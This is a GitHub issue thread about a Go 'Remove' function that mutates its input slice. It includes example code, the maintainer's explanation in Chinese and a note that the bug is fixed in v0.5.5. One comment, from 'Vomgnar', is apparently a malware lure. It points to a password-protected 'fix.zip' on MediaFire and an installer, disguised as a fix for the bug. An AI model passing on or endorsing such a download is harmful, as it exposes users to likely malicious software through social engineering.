### ISSUE TITLE
Bug in Remove Function

### ISSUE THREAD

**Issue by mudream4869** [HazelnutParadise/Go-Utils#1]
[Run at go playground](https://go.dev/play/p/mwtANjiAIfD?v=goprev)

```go
func main() {
	letters := []string{"a", "b", "c", "d", "e"}
	letters2, err := Remove(letters, 2)
	if err != nil {
		panic(err)
	}
	fmt.Println(letters)
	fmt.Println(letters2)
}
```

Expect:

```
[a b c d e]
[a b d e]
```

Result:

```
[a b d e e]
[a b d e]
```

**Comment by Vomgnar** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by TimLai666** [comment]
原因：如果原切片的容量足夠大來容納新的元素，append 可能會直接在原切片的底層數組上進行操作，導致原切片被修改。
解決方案：在函數開始時創建一個新的切片來存儲結果。
狀態：處理中

**Comment by TimLai666** [comment]
fixed in v0.5.5
